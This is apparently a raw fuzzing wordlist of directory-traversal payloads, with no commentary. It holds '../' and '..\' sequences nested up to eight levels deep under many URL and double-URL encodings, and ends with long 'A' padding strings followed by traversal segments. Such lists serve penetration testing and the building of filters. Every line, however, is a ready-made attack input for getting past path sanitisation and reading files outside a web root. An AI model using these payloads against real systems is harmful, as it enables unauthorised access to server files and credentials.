-/%252e%252e%252f%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f -/..\ -/..\..\ -/..\..\..\ -/..\..\..\..\ -/..\..\..\..\..\ -/..\..\..\..\..\..\ -/..\..\..\..\..\..\..\ -/..\..\..\..\..\..\..\..\ -/..%5c -/..%5c..%5c -/..%5c..%5c..%5c -/..%5c..%5c..%5c..%5c -/..%5c..%5c..%5c..%5c..%5c -/..%5c..%5c..%5c..%5c..%5c..%5c -/..%5c..%5c..%5c..%5c..%5c..%5c..%5c -/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c -/%2e%2e\ -/%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e%5c -/%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/..%255c -/..%255c..%255c -/..%255c..%255c..%255c -/..%255c..%255c..%255c..%255c -/..%255c..%255c..%255c..%255c..%255c -/..%255c..%255c..%255c..%255c..%255c..%255c -/..%255c..%255c..%255c..%255c..%255c..%255c..%255c -/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c -/%252e%252e\ -/%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e%255c -/%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c -/../ -/../../ -/../../../ -/../../../../ -/../../../../../ -/../../../../../../ -/../../../../../../../ -/../../../../../../../../ -/..%2f -/..%2f..%2f -/..%2f..%2f..%2f -/..%2f..%2f..%2f..%2f -/..%2f..%2f..%2f..%2f..%2f -/..%2f..%2f..%2f..%2f..%2f..%2f -/..%2f..%2f..%2f..%2f..%2f..%2f..%2f -/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f -/%2e%2e/ -/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/ -/%2e%2e%2f -/%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/..%252f -/..%252f..%252f -/..%252f..%252f..%252f -/..%252f..%252f..%252f..%252f -/..%252f..%252f..%252f..%252f..%252f -/..%252f..%252f..%252f..%252f..%252f..%252f -/..%252f..%252f..%252f..%252f..%252f..%252f..%252f -/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f -/%252e%252e/ -/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ -/%252e%252e%252f -/%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f -/..\ -/..\..\ -/..\..\..\ -/..\..\..\..\ -/..\..\..\..\..\ -/..\..\..\..\..\..\ -/..\..\..\..\..\..\..\ -/..\..\..\..\..\..\..\..\ -/..%5c -/..%5c..%5c -/..%5c..%5c..%5c -/..%5c..%5c..%5c..%5c -/..%5c..%5c..%5c..%5c..%5c -/..%5c..%5c..%5c..%5c..%5c..%5c -/..%5c..%5c..%5c..%5c..%5c..%5c..%5c -/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c -/%2e%2e\ -/%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\ -/%2e%2e%5c -/%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/..%255c -/..%255c..%255c -/..%255c..%255c..%255c -/..%255c..%255c..%255c..%255c -/..%255c..%255c..%255c..%255c..%255c -/..%255c..%255c..%255c..%255c..%255c..%255c -/..%255c..%255c..%255c..%255c..%255c..%255c..%255c -/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c -/%252e%252e\ -/%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\ -/%252e%252e%255c -/%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c -/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c -/\../ -/\../\../ -/\../\../\../ -/\../\../\../\../ -/\../\../\../\../\../ -/\../\../\../\../\../\../ -/\../\../\../\../\../\../\../ -/\../\../\../\../\../\../\../\../ -//..\ -//..\/..\ -//..\/..\/..\ -//..\/..\/..\/..\ -//..\/..\/..\/..\/..\ -//..\/..\/..\/..\/..\/..\ -//..\/..\/..\/..\/..\/..\/..\ -//..\/..\/..\/..\/..\/..\/..\/..\ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../ -/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\ 